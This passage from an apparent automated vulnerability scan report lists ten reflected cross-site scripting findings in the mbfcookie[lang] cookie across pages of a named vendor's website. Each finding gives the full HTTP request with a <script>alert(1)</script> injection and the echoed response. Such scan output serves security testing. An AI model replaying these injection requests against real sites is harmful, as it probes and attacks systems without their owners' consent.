Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/arbor-powers-continent-8-technologies-ddos-mitigation-service.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en3d75d"><script>alert(1)</script>8224aca7549; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:54:53 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=2926e27934b597acfb84a5a477897674; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:54:54 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:54:54 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:54:55 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:54:56 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="en3d75d\"><script>alert(1)</script>8224aca7549">
...[SNIP]...

3.133. http://www.arbornetworks.com/en/asert-arbor-security-engineering-response-team-2.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/asert-arbor-security-engineering-response-team-2.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e43ff"><script>alert(1)</script>b793ea52c1b was submitted in the mbfcookie[lang] cookie. This input was echoed as e43ff\"><script>alert(1)</script>b793ea52c1b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/asert-arbor-security-engineering-response-team-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=ene43ff"><script>alert(1)</script>b793ea52c1b; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:52:40 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=564a9f15ff3e6e27cb466251245f4c93; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:52:41 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:52:41 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:52:42 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:52:42 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="ene43ff\"><script>alert(1)</script>b793ea52c1b">
...[SNIP]...

3.134. http://www.arbornetworks.com/en/atlas-global-network-threat-analysis-460.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/atlas-global-network-threat-analysis-460.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 804ae"><script>alert(1)</script>00ecfe4a1d9 was submitted in the mbfcookie[lang] cookie. This input was echoed as 804ae\"><script>alert(1)</script>00ecfe4a1d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/atlas-global-network-threat-analysis-460.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en804ae"><script>alert(1)</script>00ecfe4a1d9; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:50:43 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=15aac11375f31ae52e77accbda94e455; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:50:45 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:50:45 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:50:46 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:50:46 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="en804ae\"><script>alert(1)</script>00ecfe4a1d9">
...[SNIP]...

3.135. http://www.arbornetworks.com/en/channel-partners-3.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/channel-partners-3.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a0c4"><script>alert(1)</script>58c339d6161 was submitted in the mbfcookie[lang] cookie. This input was echoed as 1a0c4\"><script>alert(1)</script>58c339d6161 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/channel-partners-3.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en1a0c4"><script>alert(1)</script>58c339d6161; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:54:19 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=12b1b857bef65e5f6a00e6c0acbfe617; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:54:20 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:54:20 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:54:21 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:54:22 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="en1a0c4\"><script>alert(1)</script>58c339d6161">
...[SNIP]...

3.136. http://www.arbornetworks.com/en/com-5fcontent/view-2.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/com-5fcontent/view-2.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90b69"><script>alert(1)</script>158d46c471b was submitted in the mbfcookie[lang] cookie. This input was echoed as 90b69\"><script>alert(1)</script>158d46c471b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/com-5fcontent/view-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en90b69"><script>alert(1)</script>158d46c471b; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:53:02 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=1eee34dce72c206720e7174b964eaccf; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:53:03 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:53:03 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:53:04 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:53:04 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="en90b69\"><script>alert(1)</script>158d46c471b">
...[SNIP]...

3.137. http://www.arbornetworks.com/en/com-5fcontent/view-3.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/com-5fcontent/view-3.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc0bb"><script>alert(1)</script>910074bfd64 was submitted in the mbfcookie[lang] cookie. This input was echoed as dc0bb\"><script>alert(1)</script>910074bfd64 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/com-5fcontent/view-3.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=endc0bb"><script>alert(1)</script>910074bfd64; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:53:21 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=d0846fcdd6654ed6ae07863593536390; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:53:22 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:53:22 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:53:23 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:53:23 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="endc0bb\"><script>alert(1)</script>910074bfd64">
...[SNIP]...

3.138. http://www.arbornetworks.com/en/contact-us-4.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/contact-us-4.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfa46"><script>alert(1)</script>3a748a1b21e was submitted in the mbfcookie[lang] cookie. This input was echoed as bfa46\"><script>alert(1)</script>3a748a1b21e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/contact-us-4.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=enbfa46"><script>alert(1)</script>3a748a1b21e; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:49:19 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=9ffb7b2b334dc66c05bfc0e48191fee6; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:49:20 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:49:20 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:49:21 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:49:22 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="enbfa46\"><script>alert(1)</script>3a748a1b21e">
...[SNIP]...

3.139. http://www.arbornetworks.com/en/contact-us.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/contact-us.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56d01"><script>alert(1)</script>e5f9fcae8fd was submitted in the mbfcookie[lang] cookie. This input was echoed as 56d01\"><script>alert(1)</script>e5f9fcae8fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/contact-us.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en56d01"><script>alert(1)</script>e5f9fcae8fd; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:54:57 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=d84e329f7da92c3b9806916aaf72b74b; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:54:58 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:54:58 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:54:59 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:55:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="en56d01\"><script>alert(1)</script>e5f9fcae8fd">
...[SNIP]...

3.140. http://www.arbornetworks.com/en/customer-solution-briefs.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/customer-solution-briefs.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d93e"><script>alert(1)</script>110881cc17b was submitted in the mbfcookie[lang] cookie. This input was echoed as 5d93e\"><script>alert(1)</script>110881cc17b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/customer-solution-briefs.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en5d93e"><script>alert(1)</script>110881cc17b; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:50:09 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=6ffdd77ca83c0b6a8ec34466430c8f3a; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:50:11 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:50:11 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:50:12 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:50:12 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="en5d93e\"><script>alert(1)</script>110881cc17b">
...[SNIP]...

3.141. http://www.arbornetworks.com/en/fingerprint-sharing-alliance-defending-against-network-attacks-2.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/fingerprint-sharing-alliance-defending-against-network-attacks-2.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68d52"><script>alert(1)</script>29df373fe4f was submitted in the mbfcookie[lang] cookie. This input was echoed as 68d52\"><script>alert(1)</script>29df373fe4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/fingerprint-sharing-alliance-defending-against-network-attacks-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en68d52"><script>alert(1)</script>29df373fe4f; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:53:35 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=42b44ca8a06b1e8283bd881cdb5ffea3; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:53:35 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:53:35 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:53:36 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:53:37 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="en68d52\"><script>alert(1)</script>29df373fe4f">
...[SNIP]...

3.142. http://www.arbornetworks.com/en/ipv6-report.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/ipv6-report.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e8e4"><script>alert(1)</script>c0ea527a00e was submitted in the mbfcookie[lang] cookie. This input was echoed as 4e8e4\"><script>alert(1)</script>c0ea527a00e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/ipv6-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en4e8e4"><script>alert(1)</script>c0ea527a00e; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:57:22 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=dfb89dd8541f4cde83a78802c4ae7fd8; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:57:22 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:57:22 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:57:23 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:57:46 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
